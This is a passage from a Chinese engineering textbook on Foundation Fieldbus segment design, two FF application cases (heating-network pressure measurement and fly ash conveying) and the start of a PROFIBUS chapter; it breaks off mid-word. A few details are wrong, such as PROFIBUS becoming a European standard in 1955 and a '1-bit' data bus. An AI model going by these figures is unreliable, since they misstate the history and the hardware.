网桥和网关是网段之间的连接设备。网桥用于连接不同速率的现场总线网段或不同物理层,如金属线、光导纤维等的现场总线网段,从而组成一个更大的网络。网桥可以是总线供电也可以是非总线供电的设备。网关用于将FF的H1网段连向采用其他通信协议的网段,例如高速以太网(HSE)、LonWorks网段等,连向HS网段的网关又称为链接设备。2.总线供电与网络配置在网络上如果有两线制的总线供电现场设备,应该确保有足够的电压可以驱动它,每个设备至少需要9V电压,为了确保这一点,在配置现场总线网段时需要知道以下情况:1)当前每个设备的功耗情况。2)设备在网络中的位置。3)电源在网络中的位置。4)每段电缆的阻抗。5)电源电压。每段总线压降可由对直流回路的分析得到,现以图5⁃20所示的网络作为示例讲解。假设在接口板处设置一个15V的电源,而且在网络中全部使用B型电缆。在10m的分支线处,有一个现场设备FD3采用单独供电方式(实质上是一个4线制设备),在10m分支线处还有一个现场设备FD2,电流为20mA,其他设备各自耗能为10mA。网桥为单独供电方式,并不消耗任何网络电流。忽略温度影响,每米导线电阻为0.1Ω。表5⁃7列出了每段电线的电阻、流经此段的电流以及压降。 考虑到电缆在电路中的长度应是通信距离的两倍,各总线供电设备从网段上得到的电压如下:FD1处可得到12.9V,FD3处可得到10.56V,FD4处可得到10.58V,阀门处可得到10.54V,因此所有的现场设备都得到大于9V的电压,这个结果令人满意。如果网络上有更多的现场设备或网络电缆直径较小时,就不会是这种情形了,或许需要提高供电电源的电压,或许需要调整电源的安放位置。显然,这是一个烦琐乏味的计算过程,但当需要添加一个或更多的网络耗能现场设备时就不得不这样做。目前已有完成该计算过程的计算机软件,只要输入网络现状,所有的直流电压就都能立即显示出来,如果改变了网络结构,电压值将被重新计算。在某些情况下,网络可能负荷过重,以至于不能满足网络耗能现场设备的连接台数,有时还不得不重新摆放电源的位置,使每个设备的供电电压得到满足,同时一定还要考虑高温状态下电缆的电阻会增加这个因素。3.网络的连接长度H1网络的连接长度由主干及其分支长度决定。主干是指总线段上挂接设备的电缆主路径,其他与之相连的线缆通道都叫作分支线,网络分支是在主干的任何一点分接或者延伸,并添加网络设备而实现的。网络与分支的延长应该受到限制,网段上的主干长度和分支线长度的总和也是受到限制的,不同类型的电缆对应不同的最大长度。(1)网络分支长度的取值分支线应该越短越好,分支数和每个分支上的设备个数都会影响到允许的分支长度。表5⁃8列出了不同条件下每个分支最大长度的建议值。表5⁃8中指出的最大长度是推荐值,它包括一些安全因素,以确保在这个长度之内不会引起通信问题。分支长度根据电线类型、规格,网络的拓扑结构,现场设备的种类和个数而异,例如,一个分支可被延长至120m,这是在分支数较少的情况下。如果有32个分支线,那么每个分支线应短于1m,分支线表并不是绝对的,如果有25个分支,每支上有一个设备,长度严格按照表中规定,会选择1m的长度。如果能去掉一个设备,表中显示每段可有30m长,对于24个设备而言,可以使其中某一个的分支少于30m。 一个更常见的情况是设备中除了某一个因素以外其他都符合表中要求,例如,已有14个设备,每个分支线都是准确的90m,但第15个设备的分支线为10m,分支线的条数乘以它的长度为1270m,即14个设备的分支线长度乘以90m加上第15个设备的分支线长度,1270m的长度已经超出表格中规定的要求,但也能被认可。一种简单地估计网段主干与分支允许长度的办法如图5⁃21所示。图5⁃21表明在总线型、树形连接以及混合拓扑连接中,以主干和各分支总长度之和不超过1900m为判别标准。 (2)网络扩充中使用中继器如果现场设备间距离较长,超出规范要求的1900m时,可采用中继器延长网段长度。中继器取代了一个现场总线设备的位置,这也意味着开始了一个新的起点,新增加了一条1900m长的电缆,创建了一条新的主干线。最多可连续使用4个中继器,使网段的连接长度达到9500m。中继器可以由总线供电,也可以由非总线供电。图5⁃22所示为采用中继器延长网段长度的示意图,图中还表示了使用中继器时如何应用终端器。 除了增加网络的长度以外,使用中继器还可增加网段上的连接设备数。按规范要求,一个网段上的设备最多为32个。第一条主干有i个设备,其中之一为中继器;第二条主干有j个设备,其中之一为中继器。使用4个中继器时网段中各种设备的个数可以达到156个。(3)网络扩充中使用混合电缆有时需要几种电缆的混合使用,两种电缆的最大混合长度应满足:LX/LMAXX+LY/LMAXY<1(5⁃1)式中,LX为电缆X的长度;LY为电缆Y的长度;LMAXX为电缆X单独使用时的最大长度。LMAXY为电缆Y单独使用时的最大长度。例如,假设想混合使用1200m的A型电缆和170m的D型电缆,则有LX=1200m,LY=170m,LMAXX=1900m,LMAXY=200m。则:1200/1900+170/200=1.48>1。由于结果大于1,所以这种配线方式不可用。按公式计算表明,170m的D型电线和285m的A型电线恰好可以,因为此时结果恰好为1,另外,网络中两种类型的电缆具体位置并不重要。推广到4种类型电缆的混合公式为LV/LMAXV+LW/LMAXW+LX/LMAXX+LY/LMAXY<1在总线供电设备组成的系统中,要根据欧姆定律和电缆阻抗,用设备所需要的工作电压和电流来决定总线长度,使电源能满足总线上远端设备的供电要求。例如,在公式允许的条件下,使用190m的A型电缆和360m的C型电缆提供24V的输出,那么总线回路的阻抗为2×[(190×0.022)+(360×0.132)]Ω=103Ω。若在远端提供最小为9V的电压,则总线可提供给与此连接的远端的总线耗能设备的最大电流为1000×(24-9)/103mA=146mA。假设每个设备消耗14mA,那么此段中可以有10个设备。有许多方法可以使这种状况得到改善,例如,用一个32V输出的现场总线电源或使用一个中继器。5.2.2FF在市区热网测量系统中的应用基金会现场总线(FF)系统是把具备通信能力,同时具有控制、测量等功能的现场设备作为节点,通过总线把它们互联为网络。通过各节点仪器仪表间的操作参数与数据调用以及信息共享和系统的各项自动化功能,形成网络集成自动化系统。FF作为控制现场的最底层通信网络,可以通过符合FF协议的通信接口卡将其与工厂管理层的网络挂接,实现生产现场的运行和控制信息与控制室、办公室的管理指挥信息的沟通和一体化,构成一套完整的工业控制信息网络系统。1.总体设计FF压力测量系统由上位PC、智能压力变送器、智能压力变送器与上位PC通信的FFPC接口卡等部分构成。 系统的工作原理如下:FF智能压力变送器将测得的压力信号转化为符合基金会现场总线的数字信号传送到FF上,通过FF的信号被FFPC接口卡接收。FFPC接口卡将接收到的信号转化为符合PC_PCI总线的信号,然后通过PC_PCI总线传送到上位PC,与之相对应,上位PC的控制信号则是通过对称的方式传送到FF智能压力变送器来实现对变送器的操作的。2.FF智能压力变送器的设计FF智能压力变送器主要由传感器与输入电路、通信接口和媒体访问单元三部分构成,其中通信接口的设计是重点,该部分采用美国德州仪器(TI)公司的集成多路24位A⁃D转换器的MSC1210作为微处理器和SMAR公司的FB3050作为FF通信控制芯片来设计,实现对液体或气体压力参数的高精度数据采集、处理,以及通过FF进行数据通信。FF智能压力变送器的组成及连接方式如图5⁃24所示。下面简单介绍一下FF智能压力变送器的工作原理。压力变送器在恒流源的驱动下采集压力信号并将该信号通过由MSC1210模拟输入通道AIN0和AIN1组成的差分输入通道传送给微处理器,经过MSC1210处理之后的信号再通过FB3050和MAU与总线通信。通信接口设计是本部分的重点和难点,具体的设计方法如下:由于FB3050的接口设计上已经充分考虑了与Intel系列CPU的接口问题,因此MSC1210的数据地址总线可以直接与FB3050的数据地址总线相连接,但是必须输入一个高电平信号到PI_MODE,表示选用的是Intel系列CPU。MSC1210具有数据/地址复用端口P0,同时FB3050也支持数据/地址复用,所以需要外接地址锁存器电路。具体的连接方法是:MSC1210的P0.0~P0.7与FB3050的8位CPU数据总线PB_CDATA[7:0]对应相连接,同时输出一个高电平给FB3050的PI_MUXON,表示使用的是地址/数据复合总线,并且将MSC1210的地址锁存信号输出脚ALE与FB3050的地址锁存信号输入脚PI_CAS相连接。MSC1210地址总线的高8位输出P2端口,与FB3050的16位CPU地址总线的15~8脚对应相连。由于使用了地址/数据复用总线,因此FB3050的16位CPU地址总线的7~0脚需要与地相连接。FB3050的中断输出、MSC1210的外部中断输入均为低电平有效,所以直接相连即可完成中断请求的要求。MSC1210的时钟输出信号可以直接作为FB3050的系统时钟输入,这样MSC1210与FB3050之间的数据和控制信息的通信就得到了解决,也就完成了通信接口的设计。媒体访问单元的设计在这里就不介绍了。3.FFPC接口卡的设计上位PC与FF无法直接相连而实现它们之间的信息交换,所以必须设计FFPC接口卡来满足它们之间互相通信的要求。图5⁃25所示为FFPC接口卡设计简图,它主要由双口RAM芯片IDT7142、单片机Intel80188、通信控制器FB3050和媒体访问单元四个部分构成。本部分设计采用嵌入式控制中最常见的Intel80188CPU作为接口卡上的CPU,Intel80188提供20条地址总线,存储器寻址空间为1MB,I/O最大寻址空间为64KB(16位地址线),片内还集成了一套中断控制器、两路DMA控制器、3个16位定时器、6条可编程的存储器片选线和7条可编程的I/O接口片选线,对嵌入式控制线路的设计非常方便,在接口卡CPU与PCCPU通信方面采用的是双口RAM方式,这种方式可使两边的CPU在数据块级同步。(1)网卡设计FB3050功能齐全,可以用作现场设备的通信控制器,也可以用作主设备的通信网卡。本节设计一种智能网卡,其主要功能是管理FF网络的通信事务,使网卡能够自主地与总线上的设备通信。网卡所在的PC只提供人机界面,网卡上应包括网卡CPU与PC主机CPU的通信接口、CPU与FB3050的硬件接口、FB3050与局部存储器的接口、FB3050与总线介质存取访问的接口等4个部分。1)网卡CPU的选用。网卡CPU是网卡的核心部件,CPU选择的合适与否决定了网卡的成败。嵌入式CPU与一般单片机不一样,它除了一般单片机所具有的并口、异步串口、定时器/计数器、中断口、地址线、数据线外,还要有便于产品调试用的同步串口及总线仲裁功能。其寻址空间一般大于64KB,数据总线的宽度为16位或32位等,也就是说,嵌入式CPU不仅要有单片机的各种外部接口功能,还要有处理器的大规模信息处理功能。符合上述要求的CPU芯片很多,除了Intel80188,这里还可选用Motorola公司的MC68HC16Z1芯片。在此,将系统CPU升级为MC68HC16Z1来进行设计。MC68HC16Z1芯片有2MB的寻址空间(1MB的程序空间,1MB的数据空间)、16位的数据总线宽度、4~25MHz的时钟频率、7个中断源和12条可编程片选线等。2)网卡CPU与PC的接口。网卡CPU在正常的情况下,主要是管理现场总线网络繁忙的通信事务。当PC需要査询现场总线网络系统中某些节点的参数,或需要修改现场总线网络系统中某些节点的参数时,PC需要与网卡CPU通信。通信的方法有许多种,例如通过串行口、并行口、USB总线、ISA总线、PCI总线等。PCISA总线的速度太慢,现已被PCI总线替代。本设计选用PCI总线实现网卡CPU与PC的通信。与ISA总线相比,PCI总线复杂,但现在已有不少专用PCI接口芯片,这里选用PCI9054芯片作为PCI接口芯片,它符合PCI规范2.2版本。PCI9054的局部总线(LocalBUS)可以共享网卡CPU总线,各自都有自己的总线仲裁器,用来仲裁总线的使用权。为了使网卡CPU更好地管理现场总线网络系统的通信,在PCI9054的局部总线与网卡CPU总线之间加一块双口RAMIDT7025隔离起来,不让网卡CPU交出总线的使用权,独占总线。双口RAMIDT7025有8K×16B的容量,有双口RAMIDT7025的隔离,PC也更自由,其多任务功能照常发挥。为了使双口RAM能正常通信,在PCI9054的局部总线与网卡CPU之间必须有一对握手信号。3)网卡CPU和FB3050的接口。当今的FB3050芯片比早期的FB3050芯片简单一些,它只能挂32K×8B的RAM,而扩展地址、I/O地址和ROM等都不用,这样,FB3050与网卡CPUMC68HC16Z1之间的接口就比较简单。由于MC68HC16Z1同时具备8位数据总线与16位数据总线工作的功能,因此CPUMC68HC16Z1的数据线D7~D0与FB3050的数据线D7~D0相接;MC68HC16Z1的地址线A14~A0与FB3050的地址线A14~A0相接;CPUMC68HC16Z1用两条片选线来分别选通FB3050的32KB存储器和片内寄存器;CPUMC68HC16Z1的E时钟EXTAL同时连接到FB3050的71脚PI_CLOCK及73脚RD。FB3050既能工作在Intel的模式下,也能工作在Motorola的模式下。当FB3050工作在Intel的模式下时,73脚RD作为读选通信号输入;当工作在Motorola的模式下时,73脚RD不能作为读选通信号输入,而要与71脚PI_CLOCK一同作为时钟信号输入。FB3050的WR、PI_RESET_I、POINT_I、PO_READY、PI_INT_I等信号直接与相应信号相连。4)网卡与总线的接口。总线接口单元与通信控制器FB3050的接收输入(PI_PHPDU)、发送输出(PO_PHPDU)和发送控制(PO_TACT)3条信号线相连接。总线接口单元包含的电路有接收信号的整形滤波部分、发送信号的驱动部分以及隔离变压器部分,如图5⁃26所示。 (2)线路说明图5⁃27给出了网卡的总体框图,下面结合框图,对设计路线做进一步说明。1)关于MC68HC16Z1CPU总线。MC68HC16Z1CPU总线有1MB的程序可寻址空间及1MB的数据可寻址空间,具有1位数据总线,也可工作在8位数据总线上。它有大量的可编程序的片选线,不需要外部译码器,因而系统的连接比较简单。MC68HC16Z1CPU总线上挂有512KB的FlashROM、两组256KB的SRAM(其中一组SRAM作为备用),当有特殊情况需要使用大于256KB的SRAM时,可安装备用组。总线上还挂有16KB的双口RAM及通信控制器FB3050,通信控制器FB3050自身需要挂一块32KB的SRAM。MC68HC16Z1CPU总线上只有通信控制器FB3050采用8位数据线,其他存储器都采用16位数据线。2)关于双口RAMIDT7025。双口RAMIDT7025的R口接至MC68HC16Z1的CPU总线,L口接至PCI9054的局部总线。双口RAMIDT7025的作用是使MC68HC16Z1CPU总线及PCI9054的局部总线隔离,让MC68HC16Z1CPU独占自己的总线,以集中精力管理好现场总线的通信事务,保证通信畅通。虽然双口RAMIDT7025将MC68HC16Z1CPU总线与PCI9054的局部总线隔离,但这两套总线还得有一对握手信号,以便当一边向双口RAM写入信息后,由握手信号通知另一方在有空时取走信息。3)关于PCI总线。外部器件互连(PeripheralComponentInterconnection,PCI)总线能够配合彼此间快速访问的适配器工作,也能让处理器以接近自身总线的全速去访问适配器。假设在每个数据段中发起方(主设备)和目标设备都没有插入等待状态,数据项(双字或4字)可以在每个PCI时钟周期的上升沿传送。对于33MHz的PCI总线时钟频率,可以达到132Mbit/s的传送速率,一个66MHz的PCI总线方案使用32位或64位传送时,可以达到264Mbit/s或285Mbit/s的传送速率,这种工作速率对网卡非常适合。图5⁃28所示为一个典型的FF网络系统结构图。它包括低速网段H1和高速网段HSE,由监视操作的计算机、控制器、作为网关的网络连接设备、网卡及许多由总线连接的现场设备组成。 5.2.3FF在粉煤灰输送中的应用粉煤灰的输送是电厂整个生产过程中的一个重要环节,当前大多数的电厂都采用了浓相气力输送系统进行粉煤灰的输运。气力输送技术是利用空气流作为承载介质通过密封管道来输送颗粒及粉状物料的技术。根据粉体在输送管道中的密集程度,气力输送分为稀相气力输送和浓相气力输送。稀相输送粉体含量低于1~10kg/m3,气流速度较高,为18~30m/s,连续输送距离基本上在300m以内;浓相气力输送是粉体含量10~30kg/m3或灰气比大于25的输送方式,操作气速较低,用较高气压分股压送。根据实际情况,某工厂采用了基于FF的干输灰设备的控制系统。1.粉煤灰浓相气力输送现场总线控制系统的结构在FF现场总线标准中,企业现场总线控制网络涉及从底层现场设备到上层信息网络的数据传输。企业网络通信模型由现场控制层、监控层和企业管理层三层组成。 2.现场设备的设计开发现场设备在网络的最底层,直接与控制对象相互作用,控制对象为粉煤灰浓相气力输送装置,现场设备主要包括压力传感器、流量计以及各种气动阀门,它们共同组成一个H1总线段。阀门的动作及发送装置的运行由FF智能气动阀门定位器来控制,它由圆卡和仪表卡组成,圆卡与总线连接,提供总线的接口、通信和功能块应用的处理能力。仪表卡输入/输出现场信号,执行控制功能。采用美国国家仪器(NI)公司的FoundationFieldbusStarterKit进行开发。 (1)仪表卡的开发设计仪表卡的软件设计包括圆卡及反馈信号的读取、阀位控制信号的输出以及控制策略的制定,双CPU之间采用异步串行通信,仪表卡软件中编写从机收发程序。控制策略可采用中断和时间片分配的方式完成。(2)现场仪表圆卡的开发H1现场仪表圆卡是开发FF兼容设备的硬件接口,采用MotorolaMC68331微处理器和FujiElectricFrontier⁃1现场总线通信接口芯片,应用NI⁃FBUS功能块壳(Shell)软件进行总线设备的开发。(3)总线组态及设备调试NI⁃FBUS接口使用Intel80386EX微处理器执行总线通信软件以及通信管理软件,并采用YAMAHAYTZ42系列芯片作为总线接口控制芯片。在此,采用YTZ420芯片,YTZ420是一款由YAMAHA公司推出的用于需要实现IEC61158协议的现场总线设备的通信控制器。它提供了对IEC61158⁃2协议100%的支持,同时支持ISAS50.2数据链路层的部分协议。YTZ420的特点是低功耗,这对于需要实现本质安全的设备是最为理想的接口硬件解决方案。通过YTZ420,可将FF设备连接到计算机上。NI⁃FBUS组态器使用简单的多窗口接口进行总线组态,它采用面向工程的形式组织FF网络段所需的组态信息,并可提供参数的合理值。NI⁃FBUS监视器用于监控FF网络通信,它使用FBUS接口卡与H1网络连接,用户可选择性地获取或查看总线上不同类型的数据包,完成系统诊断,还可用于开发和调试新设备运行。(4)H1总线段上电子元件的选型选用Emerson公司的DVC5000f⁃FL型数字式阀门开/关控制器,采用二线制回路供电,具有双向数字式通信功能。压力传感器和气体流量计分别采用Emerson公司的3051压力变送器和8800A涡街流量计,用进料时间来控制进料量,以简化控制系统的结构。3.现场总线控制系统应用于粉煤灰输送的可行性分析与DCS和PLC控制系统相比,粉煤灰浓相气力输送系统采用现场总线的控制方式具有突出的优势———系统成本降低,并且这种优势随着系统规模的增大而更加明显。1)系统的集成和维护方便、快捷。2)测控精度、可靠性得到提高。3)彻底的分布控制系统。4)具有开放性和互操作性。5)信息一致性强。FF全分布式现场总线控制系统应用于过程控制时主要存在两点不足:1)控制过程中对多点进行采集的信号同步性较差。2)H1总线主要针对过程量而设计,对由开关量组成的短报文,没有提供最佳处理机制,传输效率较低。以上两个方面在本课题中表现并不明显,主要原因为:1)电厂粉煤灰的输送对输送状态的稳定性(即控制的精确度)要求并不十分苛刻,另外,操作过程中控制系统依次采集单个信号,没有同时采集多个信号的情况。基于这两点考虑,采用H1总线对于保证数据的同步性基本没有影响。2)在一套气力输送装置中,仅有5个开关量用于阀门的动作,单个H1总线段上开关量设备较少,对控制系统的影响不大。 第6章PROFIBUS总线技术 PROFIBUS是一种国际化的、开放的、不依赖于设备生产商的现场总线标准,广泛应用于制造业自动化、流程工业自动化和楼宇及交通电力等领域的自动化系统中。该现场总线技术用于工厂自动化车间级监控和现场设备层的数据通信与控制,可实现现场设备层到车间级监控的分散式数字控制和现场通信,从而提供给工厂综合自动化和现场设备智能化很好的解决方案。PROFIBUS于1955年成为欧洲工业标准(EN50170),1999年成为国际标准(IEC61158⁃3),2001年被批准成为中华人民共和国机械行业标准(JB/T10308.3—2001)。PRO⁃FIBUS的市场占有率超过40%,在众多的现场总线中稳居榜首。西门子公司提供了上千种PROFIBUS产品,并已经应用在中国的许多自动控制系统中,在工厂自动化系统网络中属于单元级和现场级。PROFIBUS由PROFIBUS⁃FMS、PROFIBUS⁃DP和PROFIBUS⁃PA三部分组成。PROFI⁃BUS⁃FMS侧重于车间级较大范围的报文交换,它主要定义了主站与主站间的通信功能,用于车间级监控网络,它提供大量的通信服务,完成以中等级传输速度进行的循环和非循环的通信服务。就FMS而言,它主要考虑系统功能而非响应时间,应用过程中通常要求随机信息交换,如改变设定参数等。PROFIBUS⁃DP是具有设置简单、价格低廉、功能强大等特点的通信连接,是专门为了自动控制系统和设备级分散I/O之间通信而设计的。使用PROFIBUS⁃DP网络能够取代价格昂贵的24V或4~20mA信号线。PROFIBUS⁃DP用于分布式控制系统的高速数据传输。PROFIBUS⁃PA专为解决过程自动化控制中大量要求本质安全通信传输的问题且可提供总线供电,实现了IEC61158⁃2中规定的通信规程,用于对安全性要求较高的场合。6.1PROFIBUS控制系统组成PROFIBUS控制系统由主站和从站两部分组成。主站掌握总线中数据流的控制权。只要主站拥有访问总线权(令牌),就可以在没有外部请求的情况下发送信息。在PROFIBUS协议中,主站也被称作主动节点,主站包括PLC、PC或可作为主站的控制器。从站是简单的输入/输出设备,不拥有总线访问的授权,只能确认收到的信息或者在主站的请求下发送信息。在PROFIBUS协议中,从站也称为被动节点,只用到总线协议的一小部分,这使得它在实现总线协议时非常简单。从站包括以下设备:1)PLC(智能型I/O)可作为PROFIBUS网络上一个从站。PLC自身有程序存储功能,它的CPU执行程序并按程序驱动I/O。在PLC存储器内存在一段特定区域作为与主站通信的共享数据区,主站可通过通信间接控制从站PLC的I/O。2)分布式I/O(非智能型I/O)通常由电源、通信适配器和接线端子组成。分布式I/O不具有程序存储和程序执行能力,通信适配器部分接收主站指令,按主站指令驱动I/O,并将I/O输入及故障诊断等返回给主站。通常分布型I/O是由主站统一编址,这样在主站编程时使用分布式I/O与使用主站的I/O没有什么区别。3)变频器、传感器和执行机构等带有PROFIBUS接口的现场设备,可由主站在线完成系统配置、参数修改和数据交换等功能,至于哪些参数可进行通信以及参数格式由PROFI⁃BUS行规决定。6.2PROFIBUS基本特性PROFIBUS⁃DP、PROFIBUS⁃PA和PROFIBUS⁃FMS的性能比较见表6⁃1。 1.传输技术现场总线系统的应用往往取决于选用的传输技术。由于单一的传输技术不可能满足所有的要求,故PROFIBUS提供3种类型的传输:用于PROFIBUS⁃DP和PROFIBUS⁃FMS的EIA⁃485传输技术、用于PROFIBUS⁃PA的IEC61158⁃2传输和光纤传输技术。(1)EIA⁃485传输技术EIA⁃485传输技术是PROFIBUS最常用的一种传输技术,通常称为H2,如图6⁃1所示。它采用屏蔽双绞铜线,共用一根导线对,适用于需要高速传输、设备简单和价格低廉的领域。PROFIBUS⁃DP与PROFIBUS⁃FMS都使用相同的EIA⁃485传输技术和统一的总线访问协议,因此,这两种系统可在同一总线上操作。图6⁃1H2总线段的结构(2)IEC61158⁃2传输技术IEC61158⁃2传输技术能够满足化工、石化等过程控制领域的要求,它是一种位同步协议,可保持本质安全性,并为现有设备提供网络供电。IEC61158⁃2传输技术通常称为H1,用于PROFIBUS⁃PA。IEC61158⁃2传输技术的基本原理为:1)每段只有一个电源作为供电装置。2)每站现场设备所消耗的为常量稳态基本电流。3)现场设备的作用如同无源的电流吸收装置。 4)主干线两端起无源终端的作用。5)支持介质冗余。IEC61158⁃2传输技术特性为:1)采用数字式、位同步、曼彻斯特编码的数据传输。2)传输速率为31.25kbit/s,电压式。3)通过前同步信号,采用起始和终止限定符避免误差,保证数据传输可靠性。4)介质为屏蔽/非屏蔽双绞线,这取决于环境条件。5)可选远程电源供电。6)防爆型,能进行本质及非本质安全操作。7)网络拓扑为总线型、树形或星形结构。8)每段32个站(不带中继器),最多127个站(带中继器)。9)中继器最多可扩展至4台。如图6⁃2所示,为了使EIA⁃485信号与IEC61158⁃2信号相匹配,IEC61158⁃2传输技术总线段和EIA⁃485传输技术总线段的连接需要用分段耦合器。分段耦合器为现场设备的远程电源供电,供电装置可限制IEC61158⁃2总线的电流和电压。(3)光纤传输技术PROFIBUS总线在电磁干扰很大的环境下应用时,可使用光纤导体,以延长高速传输的距离。光纤导体分为两类,一是价格低廉的塑料纤维导体,传输距离小于50m;另一种是玻璃纤维导体,传输距离大于1km。许多厂商提供专用总线插头,可将EIA⁃485信号转换成光纤导体信号或将光纤导体信号转换成EIA⁃485信号。2.PROFIBUS协议(1)协议结构PROFIBUS协议结构是根据ISO7489国际标准,并以开放式系统互联模型作为参考模型的。如图6⁃3所示,该模型分为7层。PROFIBUS⁃DP定义了第1、2层和用户接口,第3~7层未加描述。该结构确保了数据传输的快速性和有效性,直接数据链路映像程序提供易于进入第2层的用户接口,该接口规定了用户以及设备可调用的应用功能,并详细说明了各种不同PROFIBUS⁃DP设备的行为特性。PROFIBUS⁃FMS定义了第1、2、7层,应用层包括现场总线信息规范(FMS)和低层接口(LowerLayerInterface,LLI)。现场总线信息规范包括了应用协议并向用户提供了可广泛选用的强有力的通信服务,低层接口协调不同的通信关系并提供不依赖设备的第2层访问接口。第2层现场总线数据链路层(FDL)可完成总线访问控制和数据的可靠性,它还为PROFIBUS⁃FMS提供了EIA⁃485传输技术或光纤。PROFIBUS⁃PA的数据传输采用扩展的DP协议,另外还描述了现场设备行为的PA行规。根据IEC61158⁃2标准,PA的传输技术可确保其本质安全性,而且可通过总线给现场设备供电。使用分段耦合器可在PROFIBUS⁃DP上扩展PROFIBUS⁃PA网络。(2)介质访问协议在PROFIBUS总线中,主站之间采用令牌传送方式,主站与从站之间采用主/从方式。令牌传递程序保证每个主站在一个确切规定的时间内得到总线存取权,主站得到总线存取令牌时可与从站通信。每个主站均可向从站发送或读取信息,因此,可能有3种系统配置方式:①纯主/从系统;②纯主/主系统;③混合系统。如图6⁃4所示,PROFIBUS总线带有3个主站和7个从站。3个主站之间构成令牌逻辑环。制定总线上的站点分配并建立逻辑环是总线系统初建时主站的任务。在总线运行期间,断电或损坏的主站必须从逻辑环中排除,新上电的主站必须加入逻辑环。当某主站得到令牌报文后,该主站可在一定时间内执行主站工作,在这段时间内,它既可依照主/从通信关系表与所有从站通信,也可依照主/主通信关系表与所有主站通信。保证数据的完整性是数据链路层的另一重要任务,这是依靠所有报文的海明距离HD=4、按照国际标准IEC870⁃5⁃1制定的使用特殊起始和结束定界符、无间距的字节同步传输及每个字节的奇偶校验来保证的。6.3PROFIBUS⁃FMSPROFIBUS⁃FMS的设计旨在解决车间监控级通信问题,如图6⁃5所示。在该层控制器(如PLC、PC等)之间需要传送比现场层更大量的数据,但通信的实时性要求低于现场层。PROFIBUS⁃FMS的基本特征如下:1)为连接智能现场设备而设计,如PLC、PC和人机界面(Man⁃MachineInterface,MMI)等。2)强有力的应用服务提供广泛的功能。3)面向对象的协议。4)多主机和主/从通信。5)点对点、广播和局部广播通信。6)周期性和非周期性的数据传输。7)每个设备的用户数据多达240B。8)由主要PLC制造商支持。9)产品线丰富,如PLC、PC、VME(VersaModuleEurocard)、MMI和智能I/O等。1.PROFIBUS⁃FMS应用层PROFIBUS⁃FMS应用层为用户提供了通信服务。这些服务包括访问变量、程序传递和事件控制等。PROFIBUS⁃FMS应用层包括下面两部分:1)FMS:描述了通信对象和应用服务。2)LLI:用于将FMS适配到OSI参考模型第2层的接口。2.PROFIBUS⁃FMS通信模型利用通信关系,PROFIBUS⁃FMS将分散的过程统一到一个共用的过程中。在该应用过程中,可用来通信的现场设备称为虚拟现场设备(VFD),在实际现场设备与VFD之间设立一个通信关系表。通信关系表是VFD通信变量的集合,如零件数、故障率和停机时间等。VFD通信关系表完成对实际设备的通信。3.通信对象与对象字典PROFIBUS⁃FMS面向对象通信,确认5种静态通信对象:简单变量、数组、记录、域和事件,还确认两种动态通信对象:程序调用和变量表。每个FMS设备的所有通信对象都填入对象字典。对简单设备,对象字典可以预定义,对复杂设备,对象字典可以本地或远程通过组态加到设备中去,如图6⁃6所示。静态通信对象进入静态对象字典,动态通信对象进入动态对象字典。每个对象均有一个唯一的索引,为避免非授权存取,每个通信对象可选用存取保护。4.PROFIBUS⁃FMS服务PROFIBUS⁃FMS服务项目是ISO9506的制造信息规范(MMS)服务项目的子集。这些现场总线在应用中已被优化,而且还加上了通信提出的广泛需求,服务项目的选用取决于特定的应用,具体的应用领域在PROFIBUS⁃FMS行规中规定。5.低层接口第7层到第2层服务的映射由LLI来解决,其主要任务是数据流控制和连接监视。用户通过称为通信关系的逻辑通道与其他应用过程进行通信,PROFIBUS⁃FMS设备的全部通信关系都列入通信关系表(CRL),每个通信关系通过通信索引(CREF)来査找,CRL中包含了CREF和第2层及LLI地址间的关系。6.网络管理PROFIBUS⁃FMS提供网络管理功能,由现场总线管理层第7层来实现,其主要功能有:上下关系管理、配置管理和故障管理等。 7.PROFIBUS⁃FMS行规PROFIBUS⁃FMS提供了范围广泛的功能来保证它的普遍应用。在不同的应用领域中,具体需要的功能范围必须与具体应用要求相适应。设备的功能必须结合应用来定义,这些适应性定义称之为行规,行规提供了设备的可互换性,保证不同厂商生产的设备具有相同的通信功能。PROFIBUS⁃FMS行规包括控制器间通信行规、楼宇自动化行规和低压开关设备行规。6.4PROFIBUS⁃DPPROFIBUS⁃DP用于设备级之间的高速数据传送,中央控制器通过高速串行线同分散的现场设备(如I/O、驱动器和阀门等)进行通信,大多数数据交换都是周期性的,此外,智能化现场设备还需要非周期性通信,以进行配置、诊断和报警处理。1.设备类型如图6⁃7所示,PROFIBUS⁃DP由不同类型的设备组成,在同一总线上最多可连接127个站点,站点类型有以下3种。1)1类PROFIBUS⁃DP主站(DPM1)。1类PROFIBUS⁃DP主站是中央控制器,在预定的周期内,它与分散的站(如DP从站)交换信息。同一类总线上允许有多个DPM1,典型的DPM1如PLC或PC。2)2类PROFIBUS⁃DP主站(DPM2)。2类PROFIBUS⁃DP主站是编程器、组态设备或操作面板,在PROFIBUS⁃DP系统组态操作时使用,完成系统操作和监视目的。一般同一总线上只有1个2类主站。3)PROFIBUS⁃DP从站。PROFIBUS⁃DP从站是进行输入和输出信息采集与发送的外围设备(I/O设备、驱动器、HMI和阀门等)。图6⁃8所示为各类型设备的主要功能。2.基本功能PROFIBUS⁃DP的主站周期性地读取设备输入信息,并向从站发送输出信息,总线循环时间必须要比中央控制的循环时间短。PROFIBUS⁃DP的基本特性如下:1)采用EIA⁃485双绞线或光纤,通信速率为9.6kbit/s~12Mbit/s。在一个有着32个站点的分布系统中,DP对所有站点传送512位输入和512位输出,在12Mbit/s时只需1ms。 2)各主站间为令牌传送,主站与从站间为主⁃从传送,支持单主或多主系统,总线上最多站点(主⁃从设备)数为127。3)通信:点对点(用户数据传送)或广播(控制指令)。循环主/从用户数据传送和非循环主/主数据传送。4)各从站支持动态激活和撤销,检查从站配置。5)通过总线可对主站配置,可给从站设定地址,每个从站最大为246B的输入或输出空间。6)诊断功能可对故障进行快速定位,诊断信息在总线上传输并由主站收集,这些诊断信息分为3类:站诊断,表示本站设备的一般操作状态,如温度过高,电压过低;模块诊断,表示站点I/O模块出现故障;通道诊断,表示单独的输入输出位的故障。7)PROFIBUS⁃DP允许构成单主站或多主站系统。系统配置说明包括:站点数、站点地址和输入输出数据的格式、诊断信息格式以及所用总体参数。8)运行模式:运行、清除和停止。9)同步。控制指令允许输入和输出同步,同步模式为输出同步,锁定模式为输入同步。10)可靠性和保护机制。所有信息的传输按海明距离HD=4进行,从站带看门狗定时器(WatchdogTimer)对从站的输入/输出进行存取保护,主站上带可变定时器的用户数据传送监视。3.扩展功能PROFIBUS⁃DP扩展功能是对其基本功能的补充,与基本功能兼容。扩展功能的实现通常采用软件更新的方法,详细规格参阅PROFIB